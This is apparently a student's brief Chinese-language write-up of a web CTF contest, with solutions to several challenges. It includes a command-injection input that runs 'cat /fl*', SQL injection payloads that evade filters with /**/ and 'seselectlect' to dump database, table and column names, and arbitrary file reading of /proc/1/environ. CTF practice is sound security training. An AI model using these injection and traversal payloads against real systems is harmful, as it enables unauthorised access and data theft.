谢谢师兄的神之一手

ezflask

焚靖可以直接秒

flag{d03abb12-b474-420b-8943-7d4bb0dd1035}

ezjs

F12里面有一个main.js

里面提到了getflag.php和POST请求和score参数

ezrce

检测num是否等于1234且要大于1234

用1234e5进行绕过

New和star进行post传参

new=\system&star=cat /fl*

ezsql

本题中空格被过滤了

空格可以用/**/绕过

Order by也被过滤了,那就union select 1,2,3一个个试试

select估计被过滤消除了,seselectlect绕过

0/**/union/**/seselectlect/**/1,2,database()#

库名ctf

0/**/union/**/seselectlect/**/1,2,group_concat(schema_name)/**/from/**/information_schema.schemata#查询数据库名

数据库名xuanyuanCTF

0/**/union/**/seselectlect/**/1,2,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=’xuanyuanCTF’#

表名是info

0/**/union/**/seselectlect/**/1,2,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema=’xuanyuanCTF’/**/and/**/table_name=’info’#

三个列名id,title,content

试了一边发现再content里

0/**/union/**/seselectlect/**/1,2,select/**/content/**/from/**/xuanyuanCTF.info#

解一下码就行了

ezssrf

最抽象的一集

目录扫描出一个flag

师兄说是非预期解,但是懒得修了

ezweb

非预期解

字典爆破

长度不同的是123456789

Booke_path= 可以进行任意文件访问

字典进行爆破/proc/1/environ长度不一样

Flag如下

预期解可以参考大佬的博客

https://blog.csdn.net/2302_80296003/article/details/148145924

或者是大佬的pdf

唉,我还得练啊

签到

第一关

纯数字不行，

传一个2025+

改一下请求头和User-Agent

ai秒了

Cat more tac less都被禁用，nl可以用nl /fl*